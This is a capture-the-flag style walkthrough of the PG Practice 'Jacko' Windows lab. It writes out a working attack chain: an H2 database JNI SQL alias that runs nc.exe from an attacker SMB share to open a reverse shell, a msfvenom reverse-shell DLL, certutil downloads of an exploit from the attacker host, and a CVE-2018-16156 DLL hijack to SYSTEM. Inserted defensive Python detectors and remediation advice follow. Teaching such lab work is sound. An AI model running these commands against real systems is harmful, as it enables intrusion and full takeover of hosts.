PG Practice - Jacko Walkthrough

Dec 26, 2023 · 7 mins read

Introduction

This report provides a comprehensive analysis of a penetration test performed on ‘Jacko,’ a designated Windows machine classified as intermediate difficulty from Offensive Security’s PG Practice Labs. The objective of this test was to identify and exploit vulnerabilities within Jacko, with a focus on understanding the security posture of the system and recommending measures for mitigation and improvement. The scope of this test encompassed various stages of penetration testing, including information gathering, vulnerability assessment, exploitation, and post-exploitation analysis.

The key phases in the methodology included: Information Gathering, which involved acquiring initial information about the target; Service Enumeration, focused on identifying open ports and active services; Vulnerability Identification, aimed at discovering potential vulnerabilities; Initial Access, entailing the exploitation of identified vulnerabilities to gain entry into the system; Post-Compromise Enumeration, which involved acquiring more detailed information after gaining access; and finally, Privilege Escalation, aimed at raising access rights to gain further control.

Reconnaissance

The penetration test commenced with an nmap scan, revealing several open ports. Notably, ports 80 and 8082 were identified as significant: port 80 was hosting a Microsoft IIS server, and port 8082 was serving an H2 Database Engine.

nmap -sCV -p- -T4 -v 192.168.155.66 -oA jacko
Nmap scan report for 192.168.155.66
Host is up (0.057s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: H2 Database Engine (redirect)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
7680/tcp open  pando-pub?
8082/tcp open  http          H2 database http console
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
|_http-title: H2 Console
| http-methods: 
|_  Supported Methods: GET POST
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-12-05T00:30:20
|_  start_date: N/A
|_clock-skew: -1s

Port 80

During the assessment, the H2 Database Engine interface was accessed via port 80. Although the version of the engine was not immediately discernible, the Quickstart guide revealed a web console on port 8082. Notably, default administrative credentials were found exposed on the Quickstart page, presenting a potential pathway for initial access.

Initial Access

Access to the H2 database web console on port 8082 was achieved using the default credentials. Subsequent investigation revealed that the H2 database was running version 1.4.199. This particular version is known to be vulnerable to a JNI code execution exploit. The vulnerability and its exploitation were detailed by Markus Wulftange and have been documented in a comprehensive blog post.

The critical aspect of this vulnerability lies in its ability to permit the execution of arbitrary Java code on the server, bypassing the need for a Java Compiler. This is achieved by leveraging the Java Native Interface (JNI), which allows for a Java class to be directly loaded into memory. Consequently, this exploit circumvents the typical requirement of having a Java Compiler present on the machine running the H2 database, thus posing a critical security risk.

Exploitation

In the initial phase of exploitation, the local environment had to be prepared to receive the reverse shell. Impacket's smbserver.py script was used to set up an SMB server. The rationale for this approach was that the SMB server would host the Netcat executable (nc.exe), which the exploit would then invoke on the target system.

impacket-smbserver -smb2support tmp /home/kali/pg/jacko

Simultaneously, a Netcat listener was established to capture the reverse connection:

nc -nvlp 8082

With the environment appropriately configured, the next step involved executing the SQL statements.

-- Evaluate script 
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.45.154/share/nc.exe -e cmd.exe 192.168.45.154 8082").getInputStream()).useDelimiter("\Z").next()');

The Evaluate script command leveraged the Windows command line to execute nc.exe from the SMB share set up earlier, thereby creating a reverse shell to the listener.

When the target system executed these SQL commands, the nc.exe on the target initiated a connection back to the listener on port 8082. This action resulted in the reception of the shell on the attacking machine, effectively granting access to the target system.
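
From the defender's side, the two statements above are the signal to look for. The following added example (not from the original post or from the H2 project) scans SQL statements, as they would appear in a query log or proxy capture, for CREATE ALIAS bindings to Java methods and CALLs that reach the Java runtime or a script engine; the log lines and the regular expressions are assumptions constructed for the example.

```python
import re

# CREATE ALIAS ... FOR "<java.class.method>" binds a SQL function to a Java method;
# CREATE ALIAS ... AS $$ ... $$ compiles inline Java source (needs a JDK on the host).
ALIAS_RE = re.compile(r'CREATE\s+ALIAS\b.*?\bFOR\s+"([^"]+)"', re.IGNORECASE | re.DOTALL)
INLINE_SRC_RE = re.compile(r'CREATE\s+ALIAS\b.*?\bAS\s+\$\$', re.IGNORECASE | re.DOTALL)
# Java APIs that give process or class-loading control once reachable from SQL.
DANGEROUS_API_RE = re.compile(r'java\.lang\.Runtime|ProcessBuilder|javax\.script|ScriptEngine|System\.load',
                              re.IGNORECASE)

def classify_statement(sql):
    """Return a list of finding strings for one SQL statement (empty if benign)."""
    findings = []
    m = ALIAS_RE.search(sql)
    if m:
        target = m.group(1)
        if DANGEROUS_API_RE.search(target):
            findings.append(f"alias bound to code-execution method: {target}")
        else:
            findings.append(f"user-defined Java alias created: {target}")
    if INLINE_SRC_RE.search(sql):
        findings.append("alias with inline Java source (compiler needed on host)")
    if re.search(r'\bCALL\b', sql, re.IGNORECASE) and DANGEROUS_API_RE.search(sql):
        findings.append("CALL whose argument references a Java runtime/script API")
    return findings

def scan_log(lines):
    """Return (line_number, findings) for every suspicious statement in a log."""
    hits = []
    for n, line in enumerate(lines, 1):
        f = classify_statement(line)
        if f:
            hits.append((n, f))
    return hits

# Constructed sample log: ordinary DDL/queries, the two statements from the post
# (with a harmless command in place of the reverse shell), and a benign alias.
SAMPLE_LOG = [
    'SELECT * FROM INFORMATION_SCHEMA.TABLES;',
    'CREATE TABLE test(id INT PRIMARY KEY, name VARCHAR(255));',
    'CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";',
    "CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime()"
    ".exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\Z\").next()');",
    'CREATE ALIAS GETDAY FOR "java.time.LocalDate.now";',
]

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG):
        print(f"line {n}: {'; '.join(findings)}")
```

The benign GETDAY alias is still reported, because any CREATE ALIAS by an application account is worth a review even when its target is harmless.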

Privilege Escalation

Upon establishing a foothold within the target system, the next objective was to escalate privileges to gain more comprehensive control over the system. Enumeration efforts led to the discovery of a directory named PAPERSTREAM IP within Program Files (x86). Further investigation of this directory revealed a potential vulnerability associated with the PaperStream IP (TWAIN) software.

Identifying the Vulnerability

The specific vulnerability was linked to CVE-2018-16156, a security flaw in PaperStream IP (TWAIN) 1.42.0.5685 (Service Update 7). This vulnerability revolves around the FJTWSVIC service, which runs with SYSTEM privileges and processes unauthenticated messages over the FjtwMkic_Fjicube_32 named pipe. A critical function within this service attempts to load the UninOldIS.dll library dynamically and executes its ChangeUninstallString function. Importantly, the default installation does not include this library, meaning if a DLL with that name is placed in a PATH directory, it could be executed with SYSTEM privileges.

Addressing Environment Variable Issues

During the assessment, difficulties were encountered executing basic system commands like whoami due to a misconfigured PATH environment variable on the target machine. The PATH variable is essential as it directs the operating system to executable files. If key system directories are missing from PATH, common commands and executables become inaccessible.

To address this, the PATH variable was reset using the following command:

set PATH=%SystemRoot%\system32;%SystemRoot%;

Crafting and Deploying the Exploit

During the assessment, an existing public exploit for this issue, Exploit-DB ID 49382, was identified. To use it, a custom DLL payload was first generated with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.45.154 LPORT=8082

Preparing for Payload Deployment

It was verified that the user (jacko\tony) had write permissions to the desktop directory, an important factor for placing the payload.

C:\Windows\System32\icacls.exe C:\users\tony\Desktop\
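
The precondition described under Identifying the Vulnerability, a PATH directory that a low-privileged user can write to, and the icacls check just shown can be combined into one audit. The following added example (not from the original post) parses icacls listings for each PATH entry and reports directories where Everyone, Users or Authenticated Users hold a write-capable right without a matching DENY entry; the listings and the C:\Tools and C:\Scans directories are constructed for the example.

```python
import re

# Principals any authenticated user holds, and icacls rights that allow creating/replacing files.
LOW_PRIV = {"everyone", "users", "builtin\\users", "authenticated users", "nt authority\\authenticated users"}
WRITE_TOKENS = {"F", "M", "W", "WD", "AD"}
ACE_RE = re.compile(r'^(?P<who>.+?):(?P<perms>(?:\([^)]*\))+)$')

def parse_icacls(path, text):
    """Return {principal: {"allow": set, "deny": set}} from one icacls listing."""
    acl = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):   # the first line also carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:        # blank line or the "Successfully processed" trailer
            continue
        tokens = set()
        for group in re.findall(r'\(([^)]*)\)', m.group("perms")):
            tokens.update(t.strip().upper() for t in group.split(","))
        entry = acl.setdefault(m.group("who").strip().lower(), {"allow": set(), "deny": set()})
        entry["deny" if "DENY" in tokens else "allow"].update(tokens - {"DENY"})
    return acl

def writable_by_low_priv(acl):
    """Low-privileged principals allowed a write right and not denied one."""
    return sorted(p for p, e in acl.items() if p in LOW_PRIV
                  and e["allow"] & WRITE_TOKENS and not e["deny"] & WRITE_TOKENS)

def audit_path(path_value, icacls_outputs):
    """Map each PATH directory low-privileged users can write to -> principals."""
    findings = {}
    for d in (p.strip() for p in path_value.split(";") if p.strip()):
        if d in icacls_outputs:   # directories without a listing are skipped
            who = writable_by_low_priv(parse_icacls(d, icacls_outputs[d]))
            if who:
                findings[d] = who
    return findings

# Constructed listings: a normal system32 ACL, a tools folder writable by Users,
# and a folder where Users' write right is explicitly denied.
SAMPLE_PATH = r"C:\Windows\system32;C:\Windows;C:\Tools;C:\Scans"
SAMPLE_ICACLS = {
    r"C:\Windows\system32": r"C:\Windows\system32 NT AUTHORITY\SYSTEM:(OI)(CI)(F)" "\n"
        r"  BUILTIN\Administrators:(OI)(CI)(F)" "\n" r"  BUILTIN\Users:(OI)(CI)(RX)" "\n\n"
        "Successfully processed 1 files; Failed processing 0 files\n",
    r"C:\Tools": r"C:\Tools BUILTIN\Administrators:(OI)(CI)(F)" "\n" r"  BUILTIN\Users:(OI)(CI)(M)" "\n",
    r"C:\Scans": r"C:\Scans BUILTIN\Users:(DENY)(OI)(CI)(W)" "\n" r"  BUILTIN\Users:(OI)(CI)(M)" "\n",
}
```

On a live host, feed audit_path the output of `echo %PATH%` and of `icacls <dir>` for each entry; a non-empty result is a directory to lock down before any SYSTEM service loads a DLL by bare name.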

With this confirmation, it was necessary to modify the exploit to point to the payload generated by msfvenom.

Setting Up for the Exploit Execution

In order to execute the exploit, a Python HTTP server was started on the attacker machine. This server hosted both the exploit and the payload.

python3 -m http.server 80

Subsequently, certutil was used to download the exploit script and the payload onto the target machine.

certutil -urlcache -split -f http://192.168.45.154/49382.ps1
certutil -urlcache -split -f http://192.168.45.154/UninOldIS.dll

Gaining SYSTEM Privileges

Finally, a Netcat listener was set up on port 8082 to capture the reverse connection initiated by the exploit.

nc -nvlp 8082

Running the exploit:

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\49382.ps1

Recommendations

Jacko H2 Database Vulnerability

Change Default Credentials: It was observed that the H2 Database could be accessed using default credentials. It is strongly recommended to change these credentials to robust, unique passwords. A strong password should ideally be at least 16 characters long, comprising a mix of alphanumeric and special characters.

Enable Multi-Factor Authentication (MFA): If feasible, implement multi-factor authentication. MFA adds an additional layer of security, making unauthorized access significantly more challenging.

Restrict Access: Limit access to the H2 Database engine strictly to personnel who require it for their work. Implementing access controls will reduce the risk of unauthorized access and potential internal misuse.

PaperStream IP

Review and Enhance Patch Management Policies: It is crucial to establish a robust patch management process not only for PaperStream but for all software used within the environment. This process should ensure that all software, including PaperStream, is regularly updated to the latest versions. Timely application of patches is key in protecting against known vulnerabilities. Regular reviews of these policies will help maintain an effective defense against emerging threats.
